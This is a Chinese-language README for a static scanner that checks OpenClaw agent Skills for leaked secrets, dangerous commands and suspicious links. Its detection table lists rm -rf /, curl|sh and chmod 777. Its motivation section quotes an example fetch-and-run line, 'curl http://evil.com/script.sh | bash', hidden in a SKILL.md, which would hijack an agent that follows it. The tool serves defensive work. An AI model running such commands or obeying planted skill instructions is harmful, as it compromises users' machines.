🔐 世界上有两种 Skill,一种是安全的,一种是等着被 hack 的。你不确定是哪种?我帮你查。
OpenClaw Skill Security Scanner 是一个专为 OpenClaw Skill 生态设计的静态安全分析工具。它能自动检测 SKILL.md 和引用文件中的敏感信息泄露、危险命令模式、结构完整性问题和可疑外部链接。
灵感来源:
- tech-leads-club/agent-skills (1,244⭐ today) — 专业 Agent 技能注册表
- Snyk Agent Scan — Agent Marketplace 安全扫描
- 12-factor-agents Factor 4 — Tools are just structured outputs
| 功能 | 检测内容 | 威胁等级 |
|---|---|---|
| 🔑 API Key 检测 | OpenAI, AWS, GitHub Token 等 20+ 种敏感信息 | 🔴 Critical |
| 🔐 私钥检测 | RSA/EC/SSH 私钥泄露 | 🔴 Critical |
| 🚫 危险命令 | rm -rf /, curl|sh, chmod 777 |
🟠 High |
| 🔗 恶意链接 | Bitly/TinyURL 短链接, .exe/.sh 下载 | 🟡 Medium |
| 📋 结构检查 | SKILL.md 缺失必需章节 | 🟡 Medium |
| 📝 文件完整性 | 缺少 template/reference 目录 | 🟢 Low |
# 1. 克隆仓库
git clone https://github.com/jingchang0623-crypto/openclaw-skill-security-scanner.git
cd openclaw-skill-security-scanner
# 2. 扫描你的 Skill
python3 openclaw-skill-security-scanner.py ~/.openclaw/skills/my-awesome-skill/
# 3. 批量扫描多个 Skills
for skill in ~/.openclaw/skills/*/; do
python3 openclaw-skill-security-scanner.py "$skill"
done🔐 OpenClaw Skill Security Scan Report
============================================================
📂 Skill: /home/user/.openclaw/skills/my-skill
🕐 Scan Time: 2026-05-19T06:00:00
🎯 Security Score: 85/100
📊 Grade: B (Good)
⚠️ Total Issues: 3
📋 Issues by Severity:
🟠 HIGH: 1
🟡 MEDIUM: 2
📝 Detailed Issues:
🟠 Issue #1: [HIGH] dangerous_command
Message: Dangerous command pattern detected: chmod 777
🟡 Issue #2: [MEDIUM] missing_section
Message: SKILL.md missing recommended section: usage
📄 Full report saved to: security-scan-report.json
✅ Security scan PASSED
你看过 Snyk 的报告吗?超过 13.4% 的 Agent 市场技能包含有关键漏洞。
在 OpenClaw 生态(5400+ Skills)里,每个 Skill 本质上是一组可执行指令。如果 SKILL.md 里藏了个 curl http://evil.com/script.sh | bash,你的 Agent 就变成了别人的肉鸡。
这个扫描器就是你的安检门——不管是你自己写的 Skill,还是从社区下载的,先扫一遍再说。
- 妙趣AI miaoquai.com — AI 工具导航 & 资讯平台
- OpenClaw Skills 教程 — 410+ 实战教程
- Agent Skills 术语百科 — 250+ 术语解释
- OpenClaw 踩坑实录 — AI 路上的那些坑
这个工具和我们系列的 OpenClaw 工具链配合效果最佳:
MIT — 随便用,但如果发现新漏洞请提 Issue!
Made with 🦞 by 妙趣AI
让每个 Agent 都安全地干活